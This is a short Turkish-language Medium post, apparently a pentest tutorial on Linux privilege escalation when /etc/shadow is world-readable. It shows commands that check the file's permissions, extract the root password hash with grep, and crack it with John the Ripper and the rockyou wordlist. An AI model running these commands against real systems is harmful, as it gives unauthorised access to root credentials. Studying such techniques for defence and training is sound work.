← Back to list

Linux PrivEsc: Readable /etc/shadow

Emre Aslan · 2026-01-15 14:26 · 1 claps · 1.2 min read
#linux #privesc #infosec #writeup #privilege-escalation
Open on Medium ↗
Wiki topics: 🔒 · Cybersecurity 🔓 · Open Source

Linux PrivEsc: Readable /etc/shadow

Merhaba değerli okuyucular.

Bu yazıda /etc/shadow dosyasının okunabilir olması doğrultusunda nasıl yetki yükseltme yapılır ondan bahsedeceğim.

Giriş

/etc/shadow Nedir?

Kısaca Linux sistem kullanıcılarının parolalarının hash olarak tutulduğu dosyadır.

Tespit

ls -l /etc/shadow

Komutu ile ilgili dosya üzerindeki izinleri (permissions) görüyoruz.

grep root /etc/shadow

Dosya üzerinde sadece root kullanıcısı için okuma yapıyoruz. Böylelikle iznimizi doğrulamış oluyoruz.

Hash Çıkartma ve Kırma

Az önceki adımda okuduğumuz root satırını root.hash adında bir dosyaya yazıyoruz.

grep root /etc/shadow > root.hash

John veya Hashcat gibi araçlar kullanarak çıkardığımız hash (password hash) üzerinde wordlist kullanarak parola kırma saldırısını başlatıyoruz.

john — wordlist=rockyou.txt root.hash

Son.


메타데이터
post_id
809c2beea13f
slug
linux-privesc-readable-etc-shadow-809c2beea13f
url
https://medium.com/@aslanemre/linux-privesc-readable-etc-shadow-809c2beea13f
canonical_url
https://medium.com/@aslanemre/linux-privesc-readable-etc-shadow-809c2beea13f
author_url
https://medium.com/@aslanemre
status
ok
fetched_at
2026-08-16 11:45:14